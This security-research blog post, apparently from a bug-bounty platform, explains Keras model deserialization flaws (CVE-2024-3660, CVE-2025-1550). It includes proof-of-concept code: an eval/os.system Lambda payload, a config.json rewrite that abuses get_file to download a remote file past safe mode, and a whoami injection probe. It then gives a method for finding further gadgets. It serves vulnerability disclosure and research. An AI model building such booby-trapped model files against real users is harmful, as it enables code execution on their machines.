The ability to save (serialize) and load (deserialize) trained models is fundamental to machine learning frameworks. Training a neural network can take hours, days or even weeks on expensive hardware, so developers need to save their work and share with others. Every major framework (PyTorch, Tensorflow, scikit-learn) implements these features because without it, machine learning would be impractical at scale.
In this blog post, we will explore how Keras handles model serialization and deserialization. We will revisit the infamous Lambda layer exploit and recent security improvements, and reveal why significant vulnerabilities might still exist in Keras’s deserialization pipeline. Finally, we will also provide some practical techniques for you to do your own exploration in uncovering MFV (Model File Vulnerabilities) in Keras models.
Keras Model Evolution
Keras has undergone significant evolution in its model serialization approach over the years. Originally developed as an independent library by François Chollet, Keras was integrated into Tensorflow as tf.keras becoming Tensorflow’s official high level API. However, with the release of Keras 3.0 in late 2023, the framework became standalone again, supporting multiple backends (JAX, Tensorflow, PyTorch). The Keras 3.0 announcement provides more details on what changed.
Version 3.0 also introduced a new native .keras format, which is more secure than the legacy HDF5 format but still presents interesting attack surfaces for security researchers.
Understand Keras Model Files
Before diving into the Lambda layer exploit, let's first understand how Keras saves models and what files are generated. This will help us grasp the attack surface better.
Creating a Simple Keras Model
Let's start with a basic Sequential model:
import keras
from keras.models import Sequential
from keras.layers import Dense, Input
# Create a simple model
model = Sequential([
Input(shape=(10,)),
Dense(64, activation='relu', name='hidden_layer'),
Dense(1, activation='sigmoid', name='output_layer')
])
# Compile the model
model.compile(optimizer='adam', loss='binary_crossentropy')
# Save the model
model.save('simple_model.keras')What's Inside a .keras File?
The .keras file is actually a ZIP archive containing multiple files.
> unzip -l simple_model.keras
Archive: simple_model.keras
Length Date Time Name
--------- ---------- ----- ----
116 2024-01-01 12:00 metadata.json
2847 2024-01-01 12:00 config.json
123456 2024-01-01 12:00 model.weights.h5
--------- -------
126419 3 files
The three files serve different purposes:
- metadata.json - Basic Model Information (Keras version, save date)
- config.json - Model architecture definition (this is our primary attack surface)
- Model.weights.h5 - Model weights in HDF5 file
This separation is typical across many ML frameworks—model architecture stored separately from model weights as binary data. Machine learning models typically consist of two main components: the architecture (defining the computational structure) and the weights (containing learned parameters). The architecture includes layer definitions, activation functions, and optimization settings, while weights are the numerical values learned during training. This separation enables model sharing and deployment flexibility, but also creates distinct attack surfaces - particularly in the architecture definitions where arbitrary code can be embedded.
In the context of Keras models, the most interesting file is config.json, which contains model architecture definitions that get loaded directly as executable code.
The Security-Critical config.json
Here’s what a typical config.json, looks like for a simple Dense layer:
{
"module": "keras",
"class_name": "Sequential",
"config": {
"layers": [
{
"module": "keras.layers",
"class_name": "Dense",
"config": {
"units": 64,
"activation": "relu",
"kernel_initializer": {
"module": "keras.initializers",
"class_name": "GlorotUniform",
"config": {"seed": null}
}
}
}
],
"compile_config": {
"optimizer": {
"module": "keras.optimizers",
"class_name": "Adam",
"config": {"learning_rate": 0.001}
}
}
}
}
The Security Implications
Notice how the config.json contains:
- Module names that Keras will import (keras.layers, keras.initializers)
- Class names that will be resolved via getattr()
- Configuration parameters passed directly to constructors
- Nested objects that create recursive deserialization
This structure creates multiple attack vectors that we'll explore next.
The Lambda Layer Exploit: CVE-2024-3660
The Lambda layer exploit was a critical vulnerability that allowed arbitrary code execution during model loading. Let's examine how it worked.
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Lambda
import tensorflow as tf
# Create a model with a Lambda layer that executes malicious code.
model = Sequential([
Lambda(lambda x: eval("__import__('os').system('touch /tmp/poc')" or x)),
])
# Save the model to an HDF5 file.
model.save("lambda_model.keras")Inspecting the config.json file shows the definition for the Lambda layer:
{
"module": "keras.layers",
"class_name": "Lambda",
"config": {
"name": "lambda",
"function": {
"class_name": "__lambda__",
"config": {
"code": "4wEAAAAAAAAAAAAAAAMAAAADAAAA8yAAAACXAHQBAAAAAAAAAAAAAGQBpgEAAKsBAAAAAAAAAABT
\nACkCTvopX19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ3RvdWNoIC90bXAvcG9jJykpAdoEZXZhbCkB
\n2gF4cwEAAAAg+kwvdmFyL2ZvbGRlcnMvczkvcV96Nno5MTk1ZDlmenk1ejY0a2N4Z204MDAwMGdu
\nL1QvaXB5a2VybmVsXzExODM2LzkzNTExNjk1LnB5+gg8bGFtYmRhPnIGAAAABwAAAHMPAAAAgACV
\nVNAaRdEVS9QVS4AA8wAAAAA=\n"
}
}
}
}
How the Lambda Exploit Works
Keras recursively deserializes layers. For built-in layers defined in the keras.layers package, the layer definition contains a from_config function that gets called every time a model layer type is loaded. Here is the vulnerable code snippet from the Lambda layer:
# https://github.com/keras-team/keras/blob/v3.10.0/keras/src/layers/core/lambda_layer.py
@classmethod
def from_config(cls, config, custom_objects=None, safe_mode=None):
safe_mode = safe_mode or serialization_lib.in_safe_mode()
fn_config = config["function"]
# This is where the vulnerability occurs
if (
isinstance(fn_config, dict)
and "class_name" in fn_config
and fn_config["class_name"] == "__lambda__"
):
cls._raise_for_lambda_deserialization("function", safe_mode) # Safe mode check
inner_config = fn_config["config"]
fn = python_utils.func_load(
inner_config["code"], # Base64-encoded bytecode
defaults=inner_config["defaults"],
closure=inner_config["closure"],
)
config["function"] = fnThe vulnerability occurs when python_utils.func_load() is called with the base64-encoded bytecode. This function decodes the bytecode and calls marshal.loads(), which can execute arbitrary code during the unmarshaling process. The base64-encoded payload in our example decodes to:
lambda x: eval(__import__('os').system('touch /tmp/poc'))Keras was loading user-provided code directly. However, it now enforces a default safety mode that blocks Lambda layer deserialization unless the user explicitly passes safe_mode=False.
Arbitrary Module Loading: The Deserialization Pipeline
This is a good transition to go a level above and inspect what goes on under the hood of deserializing Keras models. The main entry point is:
# https://github.com/keras-team/keras/blob/v3.10.0/keras/src/saving/serialization_lib.py
def deserialize_keras_object(config, custom_objects=None, safe_mode=True, **kwargs):
# Step 1: Handle simple types
if config in PLAIN_TYPES or not isinstance(config, dict):
return config
# Step 2: Extract serialization fields
module = config.get("module") # "keras.layers"
class_name = config.get("class_name") # "Dense", "Lambda", etc.
registered_name = config.get("registered_name")
inner_config = config.get("config", {})
# Step 3: Resolve the class/function
cls = _retrieve_class_or_fn(
class_name,
registered_name,
module,
obj_type="class",
full_config=config,
custom_objects=custom_objects,
)
# Step 4: Instantiate object with config
instance = cls(**inner_config) #
return instance
The security-critical function is _retrieve_class_or_fn, which underwent significant changes in recent versions.
def _retrieve_class_or_fn(
name, registered_name, module, obj_type, full_config, custom_objects=None
):
## ... truncated for brevity...
package = module.split(".", maxsplit=1)[0]
if package in {"keras", "keras_hub", "keras_cv", "keras_nlp"}:
try:
mod = importlib.import_module(module)
obj = vars(mod).get(name, None)
if obj is not None:
return obj
except ModuleNotFoundError:
raise TypeError(..)
raise TypeError(...)
Critical Vulnerability in Keras Version <= 3.8
Our Huntr researchers discovered a critical vulnerability in Keras versions prior to 3.9, you can read details on these reports here and here. This was later independently reported as CVE-2025-1550. The critical vulnerability allowed arbitrary python modules to be loaded and executed when the model is loaded. The key issue was unrestricted use of importlib.import_module(..). Here is the vulnerable code from Keras for version 3.8.0.
#https://github.com/keras-team/keras/blob/v3.8.0/keras/src/saving/serialization_lib.py
def _retrieve_class_or_fn(
name, registered_name, module, obj_type, full_config, custom_objects=None
):
# .... Truncated ...
# Otherwise, attempt to retrieve the class object given the `module`
# and `class_name`. Import the module, find the class.
try:
mod = importlib.import_module(module)
except ModuleNotFoundError:
raise TypeError(...)
obj = vars(mod).get(name, None)
# Special case for keras.metrics.metrics
if obj is None and registered_name is not None:
obj = vars(mod).get(registered_name, None)
if obj is not None:
return obj
raise TypeError(...)
Keras Security Improvements
Keras maintainers took concrete steps to fix many weaknesses in the deserialization libraries. Following the security principle of never trusting user input, they implemented several defenses
- Module Allowlist: Keras now only allow importing modules within the keras eco-system: `keras, keras_hub, keras_cv, keras_nlp` .
- Safe Mode by Default: safe_mode=True is enforced by default which disallows loading Keras Lambda layers
- Basic Type Checking: Ensures that object being deserialized are of the expected type (See https://github.com/keras-team/keras/pull/20751)
These improvements significantly reduced the attack surface, but didn't eliminate it entirely.
What's Still Exploitable
Despite these fixes, the attack surface of Keras remains substantial.
The allowed list of modules is still very permissive. For example, get_file in keras.utils downloads a remote file to a specified directory. This function can potentially be used in a model configuration to download arbitrary files to the victim's machine.
Here's a proof-of-concept that demonstrates this:
# Step 1: Create a simple base model
model = keras.Sequential([
keras.layers.Input(shape=(1,)),
keras.layers.Lambda(lambda x: x, name='placeholder_lambda'), # Placeholder
keras.layers.Dense(1, activation='sigmoid')
])
model.compile(optimizer='adam', loss='mse')
# Step 2: Save the legitimate model
model.save('model.keras')
# Step 3: Read the original config to preserve layer structure
with zipfile.ZipFile('model.keras', 'r') as zf:
original_config = json.loads(zf.read('config.json').decode())
# Step 4: Inject our custom Lambda layer config
for layer in original_config['config']['layers']:
if layer['class_name'] == 'Lambda' and layer['config']['name'] == 'placeholder_lambda':
# Replace with malicious config
layer['config'] = {
'name': 'malicious_downloader',
'trainable': False,
'function': {
'module': 'keras.utils',
'class_name': 'get_file',
'config': None,
'registered_name': None
},
'arguments': {
'origin': 'https://httpbin.org/json',
'cache_dir': '/tmp',
'force_download': True
}
}
break
# Step 5: Replace config.json in the .keras file
with zipfile.ZipFile('model.keras', 'r') as zf_read:
with zipfile.ZipFile('model_malicious.keras', 'w') as zf_write:
# Copy all files except config.json
for item in zf_read.infolist():
if item.filename != 'config.json':
data = zf_read.read(item.filename)
zf_write.writestr(item, data)
else:
# Write modified config.json
zf_write.writestr('config.json', json.dumps(original_config, indent=2))
# Step 6: Load the malicious model
m = keras.models.load_model('model_malicious.keras', safe_mode=True)This code injects a Lambda layer that doesn't use serialized Python lambda functions, thus bypassing the safe mode check. This provides a good starting point for exploring weaknesses in Keras's deserialization library.
Important Limitation: The current limitation of this approach is that the call method in Lambda layer passes all arguments from the layer config but always passes the input as the first argument:
#https://github.com/keras-team/keras/blob/v3.10.0/keras/src/layers/core/lambda_layer.py
def call(self, inputs, mask=None, training=None): # Inputs is passed as first argument
# We must copy for thread safety,
# but it only needs to be a shallow copy.
kwargs = {k: v for k, v in self.arguments.items()}
if self._fn_expects_mask_arg:
kwargs["mask"] = mask
if self._fn_expects_training_arg:
kwargs["training"] = training
return self.function(inputs, **kwargs)
This might limit the actual exploitation potential, but it demonstrates that calling arbitrary Python code is still possible in Keras.
Your Exploration Toolkit: Finding Your Own MFVs
Here are some practical techniques to help with your own exploration:
Systematic Function Discovery
Systematically explore functions across Keras's allowed modules (keras, keras_nlp, keras_cv, keras_hub) that might serve as good exploitation gadgets especially when combined with Lambda layer:
import keras
import inspect
module = keras.utils
callables = []
classes = []
functions = []
modules = []
for name in dir(module):
if name.startswith('_'): # Skip private attributes
continue
obj = getattr(module, name)
if not callable(obj):
continue
callables.append((name, obj))
if inspect.isclass(obj):
classes.append((name, obj))
elif inspect.isfunction(obj):
functions.append((name, obj))
elif inspect.ismodule(obj):
modules.append((name, obj))
# Get functions in the allowed-list modules
for name, func in functions[:10]:
sig = inspect.signature(func)
print(f"{name}{sig} -> {func}")
Direct Deserialization Testing
Experiment by directly deserializing layer configs to see what parameters they accept:
layer_config = {
"name": "layer_config",
"config": {
"module": "keras.layers",
"class_name": "Dense",
"config": {
"units": 64,
"kernel_initializer": {
"module": "keras.initializers",
"class_name": "Constant",
"config": {
"value": "__import__('os').system('whoami')" # Can we exploit this further?
}
}
}
}
}
# Successfull layer object creation indicates the arguments were correctly parsed.
obj = keras.saving.deserialize_keras_object(direct_injection)
Legacy Versions and File Formats
Keras maintains backward compatibility and supports legacy file formats. These formats might not have the same robust checks against deserialization exploits. Additionally, there are at least three versions of Keras code:
- TensorFlow's built-in Keras (tensorflow/keras) - slated for deletion
- tf-keras (keras-team/tf-keras) - getting regular releases
- Official Keras 3 (keras-team/keras) - multi-backend support
Each version might have different security implementations and attack surfaces.
Why This Matters For Bug Bounty Hunters
For bug bounty hunters, this isn't just an academic exercise—it's a prime opportunity to discover valuable vulnerabilities in AI/ML tools. Here's why:
Launchpad for Discovery: Use the examples in this blog as a springboard. Explore Keras model formats in depth, and you're likely to find more flaws that haven't been discovered yet.
Lucrative Bounties: Each validated Model File Vulnerability (MFV) can earn you up to $3,000+ on Huntr, boosting both your reputation and your income.
Under-explored Territory: While web application security is heavily researched, ML framework security remains relatively unexplored, giving you a competitive advantage.
Real-world Impact: These vulnerabilities affect production systems at major companies using Keras for ML workloads, making your discoveries highly valuable.
Conclusion
Keras has made significant strides in securing model deserialization since the Lambda layer exploit, but the fundamental challenge remains: balancing functionality with security in a framework designed for flexibility. The current allowlist approach, while better than unrestricted imports, still provides a substantial attack surface for creative researchers.
The key takeaway for security researchers is that Model File Vulnerabilities represent a rich, under-explored area with real-world impact. As ML adoption continues to accelerate and model sharing becomes more common, these attack vectors will only become more valuable to understand and exploit responsibly.
Whether you're a seasoned bug bounty hunter or new to ML security, now is the perfect time to dive into this space. The techniques and examples in this post should give you a solid foundation to start your own exploration of Keras MFVs and potentially discover the next critical vulnerability in one of the world's most popular ML frameworks.